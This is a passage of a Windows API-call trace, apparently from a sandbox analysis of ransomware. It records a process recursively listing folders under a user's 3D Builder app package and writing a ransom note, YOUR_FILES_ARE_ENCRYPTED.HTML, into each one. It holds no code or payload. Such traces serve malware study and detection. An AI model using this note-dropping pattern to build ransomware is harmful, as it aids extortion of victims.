ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 1 [0114.342] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 0 [0114.342] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.342] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0114.342] GetProcessHeap () returned 0x600000 [0114.342] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.343] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.344] CloseHandle (hObject=0x324) returned 1 [0114.344] GetProcessHeap () returned 0x600000 [0114.344] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.344] GetProcessHeap () returned 0x600000 [0114.344] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.345] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="Temp", cAlternateFileName="")) returned 1 [0114.345] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.345] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp") returned 90 [0114.345] GetProcessHeap () returned 0x600000 [0114.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.346] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp" [0114.346] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp\\*" [0114.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.346] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 1 [0114.347] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188870, dwReserved1=0x3187f20, cFileName="..", cAlternateFileName="")) returned 0 [0114.347] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.347] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0114.347] GetProcessHeap () returned 0x600000 [0114.347] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.348] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.349] CloseHandle (hObject=0x324) returned 1 [0114.349] GetProcessHeap () returned 0x600000 [0114.349] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.349] GetProcessHeap () returned 0x600000 [0114.349] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.350] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x408c2701, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x408c2701, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x408c2701, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="Temp", cAlternateFileName="")) returned 0 [0114.350] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0114.350] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0114.350] GetProcessHeap () returned 0x600000 [0114.350] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.351] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.351] CloseHandle (hObject=0x31c) returned 1 [0114.352] GetProcessHeap () returned 0x600000 [0114.352] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.352] GetProcessHeap () returned 0x600000 [0114.352] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.352] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40791465, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40791465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40791465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0114.352] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.352] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData") returned 90 [0114.352] GetProcessHeap () returned 0x600000 [0114.352] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.353] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData" [0114.353] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData\\*" [0114.353] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40791465, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40791465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40791465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x626978 [0114.353] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40791465, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40791465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40791465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.353] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40791465, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40791465, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40791465, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 0 [0114.353] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0114.354] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0114.354] GetProcessHeap () returned 0x600000 [0114.354] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.354] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.355] CloseHandle (hObject=0x31c) returned 1 [0114.355] GetProcessHeap () returned 0x600000 [0114.355] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.355] GetProcessHeap () returned 0x600000 [0114.355] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.356] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0114.357] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.357] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache") returned 93 [0114.357] GetProcessHeap () returned 0x600000 [0114.357] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.358] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache" [0114.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache\\*" [0114.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x626978 [0114.359] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.359] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x406862f4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x406862f4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x406862f4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 0 [0114.359] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0114.359] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0114.359] GetProcessHeap () returned 0x600000 [0114.359] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.360] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.361] CloseHandle (hObject=0x31c) returned 1 [0114.361] GetProcessHeap () returned 0x600000 [0114.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.361] GetProcessHeap () returned 0x600000 [0114.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.362] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0114.362] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.362] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState") returned 93 [0114.362] GetProcessHeap () returned 0x600000 [0114.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.362] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState" [0114.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState\\*" [0114.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 1 [0114.363] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40555014, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x40555014, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x40555014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187fbe, dwReserved1=0x3187f18, cFileName="..", cAlternateFileName="")) returned 0 [0114.363] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.363] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0114.363] GetProcessHeap () returned 0x600000 [0114.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.3dbuilder_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.364] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.364] CloseHandle (hObject=0x31c) returned 1 [0114.365] GetProcessHeap () returned 0x600000 [0114.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.365] GetProcessHeap () returned 0x600000 [0114.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.365] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: 